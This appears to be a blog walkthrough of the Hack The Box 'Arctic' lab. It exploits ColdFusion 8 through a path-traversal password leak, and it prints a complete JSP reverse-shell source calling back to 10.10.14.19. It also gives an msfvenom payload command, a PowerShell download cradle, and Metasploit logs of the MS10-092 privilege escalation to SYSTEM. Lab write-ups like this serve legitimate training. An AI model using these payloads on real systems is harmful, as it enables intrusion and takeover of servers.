Initial Enumeration
So a Windows box with 3 ports open.
Port 135: RPC
There is a vulnerability for XP boxes for RPC on 135 and MSF has an exploit for it but it didn’t work. Worth a shot but not this time.
I suspect that port 49154 is the higher port associated with the RPC
Port 8500: fmtp?
Google seems to think this is Flight Message Transfer Protocol. I tried connecting via netcat but didn’t get much. Curl produced a result though:
So an HTTP service. Let’s see what it looks like in a browser:
I recognise those directory names from ColdFusion penetrations done before. First thing is to work out which version we’re dealing with. Poking about I find:
And 2 login pages:
There is a rather good page on ColdFusion hacking here: https://nets.ec/Coldfusion_hacking
It contains a Local File Disclosure exploit: https://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en which produces a result:
#Wed Mar 22 20:53:51 EET 2017 rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true
Just googling that hash produces a decrypted result “happyday” but the guide also mentions you can just pass the hash to it with a special request which I’ll try later. For time being, I’m into the administrator console:
I’ve hacked ColdFusion before so I know the rough plan. You can browse the host OS with the Code Analyser and use the Scheduler to upload shell code from a remote site you control. Shells can be CFM or JSP.
I created a JSP shell with the following code:
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream bp;
OutputStream cu;
StreamConnector( InputStream bp, OutputStream cu )
{
this.bp = bp;
this.cu = cu;
}
public void run()
{
BufferedReader gq = null;
BufferedWriter hck = null;
try
{
gq = new BufferedReader( new InputStreamReader( this.bp ) );
hck = new BufferedWriter( new OutputStreamWriter( this.cu ) );
char buffer[] = new char[8192];
int length;
while( ( length = gq.read( buffer, 0, buffer.length ) ) > 0 )
{
hck.write( buffer, 0, length );
hck.flush();
}
} catch( Exception e ){}
try
{
if( gq != null )
gq.close();
if( hck != null )
hck.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "10.10.14.19", 8888 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
And set up a netcat listener on the relevant port, find the shell.jsp file in the CFIDE web directory using Firefox or curl to get the code executed, and we have a shell:
So we’re dealing with a 2008 R2 Server.
Just as an aside. Kali has a Coldfusion shell called cfexec.cfm. If you upload that and trigger it you get the following:
It provides a web interface for commands. Note how the instructions are wrong – well they always have been when I’ve tried them. The above is what works: path to cmd.exe in the Command field and then /c and then the command in Options. I mention this because I’ve done this before and thought the shell didn’t work, when it was just this hiccup.
Privilege Escalation
Privesc is likely to be easier if we get a meterpreter shell. I had a little difficulty with initially. I tried to create a x64 payload and it just never connected back so after multiple tries, I ended up with using a standard Windows reverse TCP meterpreter payload and then migrating.
Get A Meterpreter Shell
First create the payload using msfvenon:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.19 lport=7777 -f exe > meter_shell.exe
Then upload it onto the Windows box. We can do this several ways. We can just use the Coldfusion Scheduler to get it on but it’s a bit more elegant to do from Windows directly. Windows doesn’t have loads of tools like wget, nc etc built in but it does have Powershell. So set up the usual python -m SimpleHTTPServer in the same directory we created the meter_shell.exe payload and for this version of Windows, a simple PS command is:
powershell "(new-object System.Net.WebClient).Downloadfile('https://10.10.14.19/meter_shell.exe', 'meter_shell.exe')"
Now set up the handler in Metasploit:
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(multi/handler) > set lhost 10.10.14.19 lhost => 10.10.14.19 msf exploit(multi/handler) > set lport 7777 lport => 7777 msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.19 yes The listen address LPORT 7777 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.19:7777 [*] Sending stage (179779 bytes) to 10.10.10.11 [*] Meterpreter session 1 opened (10.10.14.19:7777 -> 10.10.10.11:56201) at 2018-09-13 15:51:01 -0400 meterpreter > getuid Server username: ARCTIC\tolis
We can get the user.txt at this point but we want root of course.
Migrate to the right architecture
In order to use any exploits we want to use, it’s likely to work better if we migrate to the 64 bit architecture. Meterpreter does this by migrating to a named process. I don’t claim to understand the details! We need to find a 64bit process running on Windows:
We know the Coldfusion ones are going to be running so we can use the jrunsvc.exe (note it’s x64) but others would be fine too. The migration module is not an in-session one so we need to background our current meterpreter session, set up the details, run it and then return to the session which is now hosted on the process we migrated to:
meterpreter > background [*] Backgrounding session 1... msf exploit(multi/handler) > use post/windows/manage/archmigration [-] Failed to load module: post/windows/manage/archmigration msf exploit(multi/handler) > use post/windows/manage/archmigrate msf post(windows/manage/archmigrate) > show options Module options (post/windows/manage/archmigrate): Name Current Setting Required Description ---- --------------- -------- ----------- EXE C:\windows\sysnative\svchost.exe yes The executable to start and migrate into FALLBACK true yes If the selected migration executable does not exist fallback to a sysnative file IGNORE_SYSTEM false yes Migrate even if you have SYSTEM privileges SESSION yes The session to run this module on. msf post(windows/manage/archmigrate) > set exe C:\ColdFusion8\runtime\bin\jrun.exe exe => C:ColdFusion8runtimebinjrun.exe msf post(windows/manage/archmigrate) > set session 1 session => 1 msf post(windows/manage/archmigrate) > run [*] You're not running as SYSTEM. Moving on... [*] The meterpreter is not the same architecture as the OS! Upgrading! [-] The selected executable to migrate into does not exist [*] Starting new x64 process C:\windows\sysnative\svchost.exe [+] Got pid 3168 [*] Migrating.. [+] Success! [*] Post module execution completed msf post(windows/manage/archmigrate) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows ARCTIC\tolis @ ARCTIC 10.10.14.19:7777 -> 10.10.10.11:56201 (10.10.10.11) msf post(windows/manage/archmigrate) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ls Listing: c:\temp
Note sessions -l lists the sessions in play and sessions -i selects the session with which to interact.
Find vulnerabilities
Now we’re set up nicely we can use the built-in tools to help us find an exploit:
meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true [*] 10.10.10.11 - Collecting local exploits for x64/windows... [*] 10.10.10.11 - 15 exploit checks are being tried... [+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable. [+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable. This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl. This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.
The suggester finds 2 possible exploits. Let’s try ms10-92 “shelevator” first.
Again this needs backgrounding to work:
meterpreter > background [*] Backgrounding session 1... msf post(windows/manage/archmigrate) > use exploit/windows/local/ms10_092_schelevator msf exploit(windows/local/ms10_092_schelevator) > show options Module options (exploit/windows/local/ms10_092_schelevator): Name Current Setting Required Description ---- --------------- -------- ----------- CMD no Command to execute instead of a payload SESSION yes The session to run this module on. TASKNAME no A name for the created task (default random) Exploit target: Id Name -- ---- 0 Windows Vista, 7, and 2008 msf exploit(windows/local/ms10_092_schelevator) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows ARCTIC\tolis @ ARCTIC 10.10.14.19:7777 -> 10.10.10.11:56201 (10.10.10.11) msf exploit(windows/local/ms10_092_schelevator) > set session 1
msf exploit(windows/local/ms10_092_schelevator) > show options Module options (exploit/windows/local/ms10_092_schelevator): Name Current Setting Required Description ---- --------------- -------- ----------- CMD no Command to execute instead of a payload SESSION 1 yes The session to run this module on. TASKNAME no A name for the created task (default random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.19 yes The listen address LPORT 6543 yes The listen port Exploit target: Id Name -- ---- 0 Windows Vista, 7, and 2008 msf exploit(windows/local/ms10_092_schelevator) > run [*] Started reverse TCP handler on 10.10.14.19:6543 [*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\DTjZFIQqTkxz.exe [*] Creating task: KQnOyIo72aISU4 [*] SUCCESS: The scheduled task "KQnOyIo72aISU4" has successfully been created. [*] SCHELEVATOR [*] Reading the task file contents from C:\Windows\system32\tasks\KQnOyIo72aISU4... [*] Original CRC32: 0xdc89715a [*] Final CRC32: 0xdc89715a [*] Writing our modified content back... [*] Validating task: KQnOyIo72aISU4 [*] [*] Folder: \ [*] TaskName Next Run Time Status [*] ======================================== ====================== =============== [*] KQnOyIo72aISU4 1/10/2018 7:10:00 �� Ready [*] SCHELEVATOR [*] Disabling the task... [*] SUCCESS: The parameters of scheduled task "KQnOyIo72aISU4" have been changed. [*] SCHELEVATOR [*] Enabling the task... [*] SUCCESS: The parameters of scheduled task "KQnOyIo72aISU4" have been changed. [*] SCHELEVATOR [*] Executing the task... [*] Sending stage (179779 bytes) to 10.10.10.11 [*] SUCCESS: Attempted to run the scheduled task "KQnOyIo72aISU4". [*] SCHELEVATOR [*] Deleting the task... [*] Meterpreter session 2 opened (10.10.14.19:6543 -> 10.10.10.11:56299) at 2018-09-13 16:15:09 -0400 [*] SUCCESS: The scheduled task "KQnOyIo72aISU4" was successfully deleted. [*] SCHELEVATOR meterpreter > cd c:/users meterpreter > ls Listing: c:\users ================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2017-03-22 14:10:31 -0400 Administrator 40777/rwxrwxrwx 0 dir 2009-07-14 01:06:44 -0400 All Users 40555/r-xr-xr-x 0 dir 2009-07-14 02:38:22 -0400 Default 40777/rwxrwxrwx 0 dir 2009-07-14 01:06:44 -0400 Default User 40555/r-xr-xr-x 4096 dir 2009-07-14 00:57:55 -0400 Public 100666/rw-rw-rw- 174 fil 2009-07-14 00:57:55 -0400 desktop.ini 40777/rwxrwxrwx 8192 dir 2017-03-22 15:00:06 -0400 tolis
We’re now SYSTEM and can capture the root flag.
hi Neil good blog
Thanks Jack!
Hi neilsec!
How can i get the waldo password to learn from your experience ?
Hi Florens
Not sure that’s something for a public post – HTB don’t want the box walkthroughs public until the machines are retired. To be honest, there are so many clues on the HTB forums now that it’s pretty much out there anyway now
But if you have a more specific question, I’ll be happy to help. PM me at the HTB forum – same username.